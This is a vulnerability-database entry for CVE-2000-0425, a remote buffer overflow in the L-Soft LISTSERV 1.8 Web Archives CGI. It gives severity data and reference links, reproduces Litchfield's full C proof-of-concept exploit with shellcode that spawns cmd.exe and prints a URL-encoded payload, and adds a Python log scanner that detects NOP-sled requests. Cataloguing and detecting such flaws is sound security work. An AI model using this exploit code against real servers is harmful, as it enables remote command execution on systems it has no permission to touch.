CVE-2000-0425
CVSS 10.0
Published: 2000-05-03 00:00:00
Revised: 2008-09-10 15:04:37

[Original] Buffer overflow in the Web Archives component of L-Soft LISTSERV 1.8 allows remote attackers to execute arbitrary commands.


[CNNVD] Buffer overflow vulnerability in L-Soft Listserv 1.8 Web Archives (CNNVD-200005-021)

The Web Archives component of L-Soft LISTSERV 1.8 contains a buffer overflow vulnerability; a remote attacker can exploit it to execute arbitrary commands.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause complete system downtime]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0425
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0425
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200005-021
(official data source) CNNVD

- Other links and resources

http://www.lsoft.com/news/default.asp?item=Advisory0
(UNKNOWN)  CONFIRM  http://www.lsoft.com/news/default.asp?item=Advisory0
http://www.securityfocus.com/bid/1167
(UNKNOWN)  BID  1167
http://archives.neohapsis.com/archives/bugtraq/2000-05/0048.html
(UNKNOWN)  BUGTRAQ  20000505 Alert: Listserv Web Archives (wa) buffer overflow

- Vulnerability information

Buffer overflow vulnerability in L-Soft Listserv 1.8 Web Archives
Critical  Buffer overflow
2000-05-03 00:00:00 2005-07-27 00:00:00
Remote / Local
The Web Archives component of L-Soft LISTSERV 1.8 contains a buffer overflow vulnerability; a remote attacker can exploit it to execute arbitrary commands.

- Advisories and patches

L-Soft has made patches available at the following location:
http://www.lsoft.com/news/default.asp?item=advisory0

- Vulnerability information (19893)

L-Soft Listserv 1.8 Web Archives Buffer Overflow Vulnerability (EDBID:19893)
Platform: windows; type: remote
2000-05-01 Verified
Author: David Litchfield
source: http://www.securityfocus.com/bid/1167/info

The Web Archive component of L-Soft Listserv contains unchecked buffer code exploitable by sending specially crafted requests to the Web Archive. This weakness will allow execution of arbitrary code by remote attackers.

/////////////////////////////////////////////////////////////////
//
//
// LSOFT's Listserv web archives wa.exe buffer overflow
//
//
// This is "proof of concept code" and will spawn a shell,
// perform a directory listing and redirect the output
// to a file called "cerberus.txt". Will work on Windows NT 4
// SP6a
//
//
// David Litchfield (mnemonix@globalnet.co.uk)
//
// 1st May 2000
//
//
// Cut and paste the output into your web browser.
//
/////////////////////////////////////////////////////////////////

#include <stdio.h>
int main()
{
 unsigned char exploit[2000]="";
 int count = 0;

 while(count <100)
  {
   exploit[count]=0x90;
   count ++;
  }

 // push ebp
 exploit[count]=0x55;
 count ++;

 // mov ebp,esp
 exploit[count]=0x8B;
 count ++;
 exploit[count]=0xEC;
 count ++;

 // mov eax, 0x77f1a986
 exploit[count]=0xb8;
 count ++;
 exploit[count]=0x86;
 count ++;
 exploit[count]=0xa9;
 count ++;
 exploit[count]=0xf1;
 count ++;
 exploit[count]=0x77;
 count ++;

 // mov ebx, 0xffffffff
 exploit[count]=0xbb;
 count ++;
 exploit[count]=0xff;
 count ++;
 exploit[count]=0xff;
 count ++;
 exploit[count]=0xff;
 count ++;
 exploit[count]=0xff;
 count ++;

 // sub ebx, 0xffffff8B
 exploit[count]=0x83;
 count ++;
 exploit[count]=0xeb;
 count ++;
 exploit[count]=0x8B;
 count ++;

 // push ebx
 exploit[count]=0x53;
 count ++;

 // push "xt.s"
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x73;
 count ++;
 exploit[count]=0x2e;
 count ++;
 exploit[count]=0x74;
 count ++;
 exploit[count]=0x78;
 count ++;

 // push "ureb"
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x62;
 count ++;
 exploit[count]=0x65;
 count ++;
 exploit[count]=0x72;
 count ++;
 exploit[count]=0x75;
 count ++;

 // push "rec "
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x20;
 count ++;
 exploit[count]=0x63;
 count ++;
 exploit[count]=0x65;
 count ++;
 exploit[count]=0x72;
 count ++;

 // push "> ri"
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x69;
 count ++;
 exploit[count]=0x72;
 count ++;
 exploit[count]=0x20;
 count ++;
 exploit[count]=0x3e;
 count ++;

 // push "d c/"
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x2f;
 count ++;
 exploit[count]=0x63;
 count ++;
 exploit[count]=0x20;
 count ++;
 exploit[count]=0x64;
 count ++;

 // push " exe"
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x65;
 count ++;
 exploit[count]=0x78;
 count ++;
 exploit[count]=0x65;
 count ++;
 exploit[count]=0x20;
 count ++;


 // push "cmd."
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x63;
 count ++;
 exploit[count]=0x6d;
 count ++;
 exploit[count]=0x64;
 count ++;
 exploit[count]=0x2e;
 count ++;

 // mov ebx, esp
 exploit[count]=0x8b;
 count ++;
 exploit[count]=0xdc;
 count ++;

 // xor esi, esi
 exploit[count]=0x33;
 count ++;
 exploit[count]=0xf6;
 count ++;

 // push esi
 exploit[count]=0x56;
 count ++;

 // push ebx
 exploit[count]=0x53;
 count ++;

 // call eax
 exploit[count]=0xff;
 count ++;
 exploit[count]=0xd0;
 count ++;

 // set a break point (int 3)
 while(count <420)
  {
   exploit[count]=0xCC;
   count ++;
  }


 // overwrite the return address

 exploit[count]=0x36;
 count ++;
 exploit[count]=0x28;
 count ++;
 exploit[count]=0xf3;
 count ++;
 exploit[count]=0x77;
 count ++;

 // put in 40 nops (0x90)

 while (count < 464)
  {
   exploit[count]=0x90;
   count ++;
  }

 // write our code that'll get us back into our un-tolower()ed string

 // mov edx, 0xFFFFFFFF
 exploit[count]=0xBA;
 count ++;
 exploit[count]=0xFF;
 count ++;
 exploit[count]=0xFF;
 count ++;
 exploit[count]=0xFF;
 count ++;
 exploit[count]=0xFF;
 count ++;

 // sub edx, 0xFFDFAC87
 exploit[count]=0x81;
 count ++;
 exploit[count]=0xEA;
 count ++;
 exploit[count]=0x87;
 count ++;
 exploit[count]=0xAC;
 count ++;
 exploit[count]=0xDF;
 count ++;
 exploit[count]=0xFF;
 count ++;

 // jmp edx
 exploit[count]=0xFF;
 count ++;
 exploit[count]=0xE2;
 count ++;

 // set readable part in memory to stop first AV

 exploit[390]=0x36;
 exploit[390]=0xf3;
 exploit[391]=0x77;

 count = 0;
 while(count < 477)
  {
   printf("%%%x",exploit[count]);
   count ++;
  }

 return 0;
}
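
As an added defender-side example (not part of the advisory, the CNNVD record or Litchfield's PoC), the following Python flags access-log requests to the wa / wa.exe CGI whose percent-decoded query is oversized or contains a long run of the 0x90 / 0xCC sled bytes the PoC above prints as %xx. The log format, host addresses, script paths, parameter names and thresholds are assumptions.

```python
"""Flag suspicious requests to the Listserv Web Archives CGI (wa / wa.exe) in
access logs: oversized decoded queries or long runs of the 0x90 / 0xCC sled bytes."""
import re
from typing import Optional
from urllib.parse import unquote_to_bytes

# Thresholds are assumptions chosen for illustration, not values from the advisory.
MAX_QUERY_BYTES = 256   # decoded query longer than this is flagged
MIN_SLED_RUN = 16       # this many identical sled bytes in a row is flagged
SLED_BYTES = (0x90, 0xCC)

LOG_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
WA_PATH_RE = re.compile(r'/wa(\.exe)?$', re.IGNORECASE)

def longest_run(data: bytes, value: int) -> int:
    """Length of the longest run of consecutive bytes equal to value."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best

def assess(log_line: str) -> Optional[dict]:
    """Finding for a request whose path ends in wa or wa.exe, else None."""
    m = LOG_RE.search(log_line)
    if not m:
        return None
    path, _, query = m.group('target').partition('?')
    if not WA_PATH_RE.search(path):
        return None
    q = unquote_to_bytes(query)          # undo the %xx encoding the client sent
    runs = {v: longest_run(q, v) for v in SLED_BYTES}
    suspicious = len(q) > MAX_QUERY_BYTES or max(runs.values()) >= MIN_SLED_RUN
    return {'path': path, 'decoded_len': len(q), 'runs': runs,
            'suspicious': suspicious}

def scan(lines):
    """All findings marked suspicious, in log order."""
    return [r for r in map(assess, lines) if r and r['suspicious']]

# Constructed sample lines (Common Log Format, hypothetical hosts and paths):
# a benign archive request, then one carrying a percent-encoded 100-byte NOP sled.
SAMPLE_LOGS = [
    '10.0.0.5 - - [05/May/2000:10:00:00 +0000] "GET /cgi-bin/wa?A0=LIST-L HTTP/1.0" 200 1234',
    '10.0.0.9 - - [05/May/2000:10:00:01 +0000] "GET /scripts/wa.exe?A2='
    + '%90' * 100 + '%cc%cc HTTP/1.0" 500 0',
]
```

Running `scan(SAMPLE_LOGS)` returns only the second line's finding, with a 100-byte run of 0x90; the benign request is assessed but not flagged.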

- Vulnerability information

OSVDB ID: 1311
L-Soft LISTSERV Web Archives Buffer Overflow
Classification: Remote / Network Access, Input Manipulation
Impact: Loss of Integrity; Solution: Unknown
Exploit: Public, Third-party Verified

- Vulnerability description

- Timeline

2000-05-05 Unknown
Unknown Unknown

- Solution

OSVDB is not aware of a solution for this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.